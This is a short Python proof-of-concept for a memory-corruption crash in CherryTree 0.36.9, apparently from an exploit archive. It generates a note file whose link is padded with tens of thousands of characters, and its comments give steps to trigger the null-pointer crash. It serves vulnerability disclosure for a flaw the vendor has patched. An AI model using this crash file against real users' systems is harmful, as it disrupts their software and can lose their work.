43 lines
No EOL
1.4 KiB
Python
Executable file
43 lines
No EOL
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
|
|
|
|
# Date: 2016-10-27
|
|
# PoC Author: n30m1nd
|
|
# Vendor Homepage: http://www.giuspen.com/cherrytree/
|
|
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
|
|
# Version: Affects all versions of CherryTree prior to 0.37.6
|
|
# Tested on: Win7 64bit and Win10 64 bit
|
|
|
|
# Credits
|
|
# =======
|
|
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
|
|
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
|
|
|
|
# How to
|
|
# ======
|
|
# * Run this python script. It will generate a "PoC-1.ctd" file.
|
|
# * Open the file and hover over the link.
|
|
# Bonus
|
|
# =====
|
|
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
|
|
|
|
# Why?
|
|
# ====
|
|
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
|
|
# trying to draw the contents of the graphical bitmaps.
|
|
|
|
# Exploit code
|
|
# ============
|
|
|
|
crashfile = '''<?xml version="1.0" ?>
|
|
<cherrytree>
|
|
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
|
|
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
|
|
</node>
|
|
</cherrytree>
|
|
'''
|
|
|
|
with open("PoC-1.ctd", 'w') as f:
|
|
f.write(crashfile)
|
|
f.close() |